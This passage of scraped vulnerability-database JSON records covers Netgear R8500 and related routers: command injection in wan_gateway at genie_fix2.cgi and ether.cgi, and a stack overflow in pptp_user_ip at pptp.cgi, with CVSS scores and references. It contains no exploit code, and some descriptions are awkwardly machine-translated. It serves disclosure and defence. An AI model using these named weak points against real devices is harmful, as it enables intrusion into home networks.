"db": "JVNDB",
"id": "JVNDB-2024-023224"
},
{
"date": "2025-05-02T15:39:40.467000",
"db": "NVD",
"id": "CVE-2024-52020"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "of netgear \u00a0R8500\u00a0 in the firmware \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023224"
}
],
"trust": 0.8
}
}
VAR-202411-0574
Vulnerability from variot - Updated: 2025-05-09 03:21Netgear R8500 v1.0.2.160 was discovered to contain a command injection vulnerability in the wan_gateway parameter at genie_fix2.cgi. This vulnerability allows attackers to execute arbitrary OS commands via a crafted request. (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the wan_gateway parameter in the genie_fix2.cgi component failing to properly filter special characters and commands in the constructed command
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-0574",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "r8500 firmware 1.0.2.160"
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "v1.0.2.160"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44811"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023264"
},
{
"db": "NVD",
"id": "CVE-2024-52019"
}
]
},
"cve": "CVE-2024-52019",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.7,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 5.1,
"id": "CNVD-2024-44811",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"id": "CVE-2024-52019",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 8.0,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2024-023264",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-52019",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2024-023264",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2024-44811",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44811"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023264"
},
{
"db": "NVD",
"id": "CVE-2024-52019"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160 was discovered to contain a command injection vulnerability in the wan_gateway parameter at genie_fix2.cgi. This vulnerability allows attackers to execute arbitrary OS commands via a crafted request. (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the wan_gateway parameter in the genie_fix2.cgi component failing to properly filter special characters and commands in the constructed command",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-52019"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023264"
},
{
"db": "CNVD",
"id": "CNVD-2024-44811"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-52019",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023264",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2024-44811",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44811"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023264"
},
{
"db": "NVD",
"id": "CVE-2024-52019"
}
]
},
"id": "VAR-202411-0574",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44811"
}
],
"trust": 1.1115042
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44811"
}
]
},
"last_update_date": "2025-05-09T03:21:10.282000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for NETGEAR R8500 genie_fix2.cgi component command injection vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/612606"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44811"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "OS Command injection (CWE-78) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023264"
},
{
"db": "NVD",
"id": "CVE-2024-52019"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-52019"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_47/47.md"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44811"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023264"
},
{
"db": "NVD",
"id": "CVE-2024-52019"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2024-44811"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023264"
},
{
"db": "NVD",
"id": "CVE-2024-52019"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-44811"
},
{
"date": "2025-05-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-023264"
},
{
"date": "2024-11-05T15:15:26.833000",
"db": "NVD",
"id": "CVE-2024-52019"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-44811"
},
{
"date": "2025-05-07T02:18:00",
"db": "JVNDB",
"id": "JVNDB-2024-023264"
},
{
"date": "2025-05-02T15:39:38.770000",
"db": "NVD",
"id": "CVE-2024-52019"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "of netgear \u00a0R8500\u00a0 in the firmware \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023264"
}
],
"trust": 0.8
}
}
VAR-202411-0607
Vulnerability from variot - Updated: 2025-05-09 03:19Netgear R8500 v1.0.2.160 was discovered to contain a command injection vulnerability in the wan_gateway parameter at ether.cgi. This vulnerability allows attackers to execute arbitrary OS commands via a crafted request. (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the wan_gateway parameter in the ether.cgi component failing to properly filter special characters and commands in constructing commands
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-0607",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "r8500 firmware 1.0.2.160"
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "v1.0.2.160"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44810"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023254"
},
{
"db": "NVD",
"id": "CVE-2024-51009"
}
]
},
"cve": "CVE-2024-51009",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.7,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 5.1,
"id": "CNVD-2024-44810",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"id": "CVE-2024-51009",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 8.0,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2024-023254",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-51009",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2024-023254",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2024-44810",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44810"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023254"
},
{
"db": "NVD",
"id": "CVE-2024-51009"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160 was discovered to contain a command injection vulnerability in the wan_gateway parameter at ether.cgi. This vulnerability allows attackers to execute arbitrary OS commands via a crafted request. (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the wan_gateway parameter in the ether.cgi component failing to properly filter special characters and commands in constructing commands",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-51009"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023254"
},
{
"db": "CNVD",
"id": "CNVD-2024-44810"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-51009",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023254",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2024-44810",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44810"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023254"
},
{
"db": "NVD",
"id": "CVE-2024-51009"
}
]
},
"id": "VAR-202411-0607",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44810"
}
],
"trust": 1.1115042
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44810"
}
]
},
"last_update_date": "2025-05-09T03:19:17.203000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for NETGEAR R8500 ether.cgi component command injection vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/612601"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44810"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "OS Command injection (CWE-78) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023254"
},
{
"db": "NVD",
"id": "CVE-2024-51009"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-51009"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_47/47.md"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44810"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023254"
},
{
"db": "NVD",
"id": "CVE-2024-51009"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2024-44810"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023254"
},
{
"db": "NVD",
"id": "CVE-2024-51009"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-44810"
},
{
"date": "2025-05-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-023254"
},
{
"date": "2024-11-05T15:15:24.807000",
"db": "NVD",
"id": "CVE-2024-51009"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-44810"
},
{
"date": "2025-05-07T02:12:00",
"db": "JVNDB",
"id": "JVNDB-2024-023254"
},
{
"date": "2025-05-02T15:39:35.130000",
"db": "NVD",
"id": "CVE-2024-51009"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "of netgear \u00a0R8500\u00a0 in the firmware \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023254"
}
],
"trust": 0.8
}
}
VAR-202411-2043
Vulnerability from variot - Updated: 2025-05-09 03:02Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a stack overflow via the pptp_user_ip parameter at pptp.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-2043",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r6400v2",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.128"
},
{
"model": "xr300",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.78"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.154"
},
{
"model": "r7000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "xr300",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6400v2",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023438"
},
{
"db": "NVD",
"id": "CVE-2024-50997"
}
]
},
"cve": "CVE-2024-50997",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.1,
"id": "CVE-2024-50997",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 5.7,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2024-023438",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-50997",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "OTHER",
"id": "JVNDB-2024-023438",
"trust": 0.8,
"value": "Medium"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023438"
},
{
"db": "NVD",
"id": "CVE-2024-50997"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a stack overflow via the pptp_user_ip parameter at pptp.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
